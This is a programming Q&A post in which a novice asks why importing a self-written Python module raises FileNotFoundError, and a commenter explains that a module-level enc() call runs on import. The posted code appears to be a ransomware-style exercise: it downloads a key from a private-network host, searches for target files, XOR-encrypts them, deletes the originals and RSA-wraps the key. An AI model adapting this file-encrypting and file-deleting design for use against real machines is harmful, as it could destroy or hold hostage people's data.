# Python3 - Cannot import local module due to FileNotFoundError

Tags: python, python-3.x, function-call

Within my code I am attempting to import modules written by myself. Said modules interact with files on the system, either encrypting, decrypting or removing them altogether. When trying to import these modules I receive the below:

```
FileNotFoundError: [Errno 2] No such file or directory: <Directory>
```

Oddly this error seems to appear before anything local within the file runs (calls are at the end), making me believe python is parsing the files during the import phase and not find the files (apologies but I am novice when it comes to importing self created stuff)

Below is one of the methods I am importing (also the one flagging the error)

```
import urllib.request, re, os

def getKey(url, path):
    urllib.request.urlretrieve(url, 'C:\\code\\'+path)

def readFiles(keyFile, targetFile, outfile):
    infile = keyFile                                            # read in the input file name
    infd = open('C:\\code\\'+infile,"r")                     # open the file and create the file descriptor infd

    key = infd.read( )
    key = key.strip('\n')
    #print('key= '+key)

    infile = targetFile
    infd = open('C:\\code\\'+infile, "r")
    ptext = infd.read( ).strip('\n')

    infd.close

    xor(outfile, ptext, key)

def xor(outfile, ptext, key):
    outfd = open('C:\\code\\'+outfile, "w")

    pLength = len(ptext)

    #get the length of the plaintext and cut the key into the same size
    keyChunks = [key[i:i+pLength] for i in range(0, len(key), pLength)]

    i = 0

    while i < len(keyChunks):
        a = int(ptext)
        b = int(keyChunks[i])

        out = a ^ b

        i=i+1

    outfd = open('C:\\code\\'+outfile, "w")
    outfd.write(str(out))
    outfd.close

def cleanup(targetFile):
    os.remove(targetFile)


def enc():
    outfile = 'affk.xor'
    getKey('http://192.168.56.10/sym.key', 'sym.key')
    readFiles('sym.key', 'affk.txt', outfile)
    cleanup('C:/code/affk.txt')

def dec():
    outfile = 'affk.txt'
    getKey('http://192.168.56.10/sym.key', 'sym.key')
    readFiles('sym.key', 'affk.xor', outfile)
    cleanup('C:/code/affk.xor')
    cleanup('C:/code/sym.key')

enc()
#dec()
```

Below is a snippet of my main file with the imports and calling function

```
import os, math, affine, re, urllib.request, ctypes
from xor import enc
from rsa1 import run
```

---Additional Code here---

```
def main():
    # Call function to search for the files we want to encrypt
    search()
    # Call function to read the target files. Main ciphers are daisy chained off reader function
    reader(targets)
    # Call function to XOR Affine cipher key
    xor.enc()
    # Call function to encrypt key used for above XOR using RSA
    rsa1.run()
```

Any assistance with this problem would be greatly appreciated! Apologies if this is an extremely dumb question!

Comment: In first code snippet there is the "enc()" call at the bottom. This is executed when importing the file.

Comment: @MichaelButscher Perfect! I would have thought calling the function directly would have ignored that statement! Thank you for the help